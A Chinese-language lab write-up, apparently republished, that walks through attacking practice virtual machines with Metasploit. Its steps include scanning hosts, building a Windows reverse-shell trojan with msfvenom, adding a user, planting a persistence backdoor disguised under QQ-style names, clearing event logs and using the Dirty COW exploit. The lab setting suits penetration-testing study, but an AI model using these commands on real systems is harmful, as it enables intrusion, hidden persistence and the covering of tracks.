Metasploit实验

Posted mingyeqf

tags:

篇首语:本文由小常识网(cha138.com)小编为大家整理,主要介绍了Metasploit实验相关的知识,希望对你有一定的参考价值。

1.实验 Metasploit

2、实验环境

本实验需准备:

  1. Kali虚拟机
    2)Windows虚拟机
    3)Centos/Ubuntu虚拟机

3、实验需求

1)将渗透主机KALI,Windows与Metasploitable2的网卡连接模式设置为NAT模式

Kali:

Windows7:

metasploitable2:

2)使用metaspoit连接postgresql,并使用合适的方法探测内网主机存活。

└─# systemctl start postgresql

msf6 > db_nmap 192.168.230.0/24
msf6 > hosts

3)使用合适的方式探测主机系统和端口

msf6 > db_nmap -sV -O -T4 192.168.128.128-132


4)根据已知信息渗透内网的Metasploitable2与windows主机

5)使用合适的方式渗透Windows主机,进行提权,创建用户Yucedu,密码为huawei@123456并留下持久化后门。

1.生成木马 && 开启监听
─# msfvenom -p windows/meterpreter/reverse_tcp lhost=192.168.230.132 lport=5555 -f exe >wshell.exe 复制到浏览器目录

2.systemctl status apache2

3.window7访问kali ip地址并下载wshell.exe

4.设置监听模块


5.提权:

6.创建用户
meterpreter > shell
C:\\Windows\\system32>chcp 65001
C:\\Windows\\system32>net user Yucedu huawei@123456 /add


在这里插入图片描述

7.留下可持续化后门
msf6 exploit(multi/handler) > use exploit/windows/local/persistence
msf6 exploit(windows/local/persistence) > set delay 5
msf6 exploit(windows/local/persistence) > set session 1

msf6 exploit(windows/local/persistence) > set VBS_NAME QQ.vbs
msf6 exploit(windows/local/persistence) > set REG_NAME QQ_GAME.reg
msf6 exploit(windows/local/persistence) > set lport 6666
msf6 exploit(windows/local/persistence) > run -j



8.查看window 7 注册表&& 生成的文件和任务管理

结束进程session 变成7

9.msf6 > handler -H 192.168.230.132 -P 6666 -p windows/meterpreter/reverse_tcp
#持久化监听

重启系统可过了5s看到又反弹了一个shell

6)清除windows渗透痕迹,根据Metasploitable2开放的端口和当前版本,进行信息搜集。

meterpreter > clearev

Metasploitable2:
msf6 > db_nmap -sV -O -T4 192.168.128.131

7)使用脏牛漏洞攻击主机Metasploitable2,并留下后门。

利用代码网址:https://github.com/FireFart/dirtycow/edit/master/dirty.c
1.复制网址的利用代码到kali 创建dirty.c 文件

靶机通过访问kali的http服务下载下来

2.编译成dirty

3.赋予可执行权限,密码为123

4.登入firefart 账号查看(就是root用户)

5.最后将其恢复:mv /tmp/passwd.bak /etc/passwd

8)将KALI的网卡切换的桥接模式。将手机与物理机连接到同一个WIFI中,使其属于同一网段。

9)使用合适的方式制作木马,下放给安卓系统手机并进行连接。

10)使用合适的命令和工具定位手机位置。

因为手机原因无法完成这个实验

以上是关于Metasploit实验的主要内容,如果未能解决你的问题,请参考以下文章

20179209《Linux内核原理与分析》安全类实验答疑

使用Metasploit渗透攻击Windows7并远程执行命令

Metasploit生成Android木马远控自己的安卓设备

Metasploit 实现木马生成捆绑及免杀

内网安全之:Metasploit 跳板攻击:portfwd 端口转发与端口映射

metasploit问题请教,谢谢!